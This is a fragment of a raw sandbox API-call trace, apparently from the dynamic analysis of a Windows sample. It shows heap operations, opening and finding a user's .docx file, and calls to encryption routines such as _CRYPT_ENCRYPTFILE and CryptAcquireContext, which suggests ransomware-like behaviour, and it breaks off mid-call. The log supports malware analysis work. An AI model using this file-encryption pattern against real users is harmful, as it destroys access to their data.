RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0075.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0075.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0075.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0075.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0075.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0075.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0075.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0075.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0075.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0075.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0075.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0075.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0075.508] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\59kI0eZovuo4vI8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\59ki0ezovuo4vi8.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0075.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0075.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0075.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0075.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0075.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0075.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0075.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0075.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0075.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0075.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0075.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0075.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0075.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0075.510] FreeLibrary (hLibModule=0x772d0000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0075.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.511] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.511] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.512] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0075.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0075.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0075.513] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0075.514] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0075.514] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0075.514] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.514] CloseHandle (hObject=0x298) returned 1 [0075.514] FreeLibrary (hLibModule=0x772d0000) returned 1 [0075.514] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0075.514] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.514] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.514] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.515] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\59kI0eZovuo4vI8.docx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf873c8e0, ftCreationTime.dwHighDateTime=0x1d581e1, ftLastAccessTime.dwLowDateTime=0x4b1fe6e0, ftLastAccessTime.dwHighDateTime=0x1d5cfe5, ftLastWriteTime.dwLowDateTime=0x4b1fe6e0, ftLastWriteTime.dwHighDateTime=0x1d5cfe5, nFileSizeHigh=0x0, nFileSizeLow=0x6823, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="59kI0eZovuo4vI8.docx", cAlternateFileName="59KI0E~1.DOC")) returned 0x41ac440 [0075.515] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0075.515] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.515] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.515] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.515] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.515] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0075.515] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.515] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.515] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.515] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.515] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.515] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.515] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0075.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.515] PeekMessageW (in: lpMsg=0x144ea34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea34) returned 0 [0075.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0075.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 